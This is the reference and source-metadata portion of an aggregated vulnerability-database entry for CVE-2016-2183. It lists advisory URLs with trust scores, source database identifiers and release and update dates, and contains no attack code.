url:	https://nvd.nist.gov/vuln/detail/cve-2016-6302	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2181	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2182	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-6303	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2179	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-6304	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2177	Trust: 0.1
url:	https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.37	Trust: 0.1
url:	https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.20	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2178	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-6306	Trust: 0.1
url:	https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.4	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2180	Trust: 0.1
url:	https://www.microfocus.com/support-and-services/report-security	Trust: 0.1
url:	https://cf.passport.softwaregrp.com/hppcf/createuser.do	Trust: 0.1
url:	https://entitlement.microfocus.com/mysoftware/index](https://entitlement.mic	Trust: 0.1
url:	https://softwaresupport.softwaregrp.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification	Trust: 0.1
url:	https://softwaresupport.softwaregrp.com/security-vulnerability	Trust: 0.1
url:	https://access.redhat.com/security/updates/classification/#moderate	Trust: 0.1
url:	https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets	Trust: 0.1
url:	https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbgn03765en_us	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-8328	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3259	Trust: 0.1
url:	https://security.gentoo.org/	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3289	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3260	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3260	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3253	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3262	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5546	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5552	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3289	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3261	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5549	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5547	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3231	Trust: 0.1
url:	http://creativecommons.org/licenses/by-sa/2.5	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3241	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3259	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3262	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-8328	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5548	Trust: 0.1
url:	http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.ht=	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5547	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-5549	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3252	Trust: 0.1
url:	https://bugs.gentoo.org.	Trust: 0.1
url:	http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3272	Trust: 0.1
url:	https://launchpad.net/ubuntu/+source/openjdk-6/6b41-1.13.13-0ubuntu0.12.04.1	Trust: 0.1

sources: VULHUB: VHN-91002 // PACKETSTORM: 142756 // PACKETSTORM: 140084 // PACKETSTORM: 144869 // PACKETSTORM: 138820 // PACKETSTORM: 150303 // PACKETSTORM: 152978 // PACKETSTORM: 143970 // PACKETSTORM: 140725 // PACKETSTORM: 141111 // NVD: CVE-2016-2183

CREDITS

Red Hat

Trust: 0.2

sources: PACKETSTORM: 144869 // PACKETSTORM: 152978

SOURCES

db:	VULHUB	id:	VHN-91002
db:	VULMON	id:	CVE-2016-2183
db:	PACKETSTORM	id:	142756
db:	PACKETSTORM	id:	140084
db:	PACKETSTORM	id:	144869
db:	PACKETSTORM	id:	138820
db:	PACKETSTORM	id:	150303
db:	PACKETSTORM	id:	152978
db:	PACKETSTORM	id:	143970
db:	PACKETSTORM	id:	140725
db:	PACKETSTORM	id:	141111
db:	NVD	id:	CVE-2016-2183

LAST UPDATE DATE

2025-08-12T22:54:37.633000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-91002	date:	2023-02-12T00:00:00
db:	VULMON	id:	CVE-2016-2183	date:	2023-02-12T00:00:00
db:	NVD	id:	CVE-2016-2183	date:	2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-91002	date:	2016-09-01T00:00:00
db:	VULMON	id:	CVE-2016-2183	date:	2016-09-01T00:00:00
db:	PACKETSTORM	id:	142756	date:	2017-05-31T10:22:22
db:	PACKETSTORM	id:	140084	date:	2016-12-08T23:45:55
db:	PACKETSTORM	id:	144869	date:	2017-11-02T23:50:49
db:	PACKETSTORM	id:	138820	date:	2016-09-22T22:25:00
db:	PACKETSTORM	id:	150303	date:	2018-11-13T17:59:55
db:	PACKETSTORM	id:	152978	date:	2019-05-20T16:39:06
db:	PACKETSTORM	id:	143970	date:	2017-08-31T23:51:24
db:	PACKETSTORM	id:	140725	date:	2017-01-25T21:55:38
db:	PACKETSTORM	id:	141111	date:	2017-02-16T14:42:20
db:	NVD	id:	CVE-2016-2183	date:	2016-09-01T00:59:00.137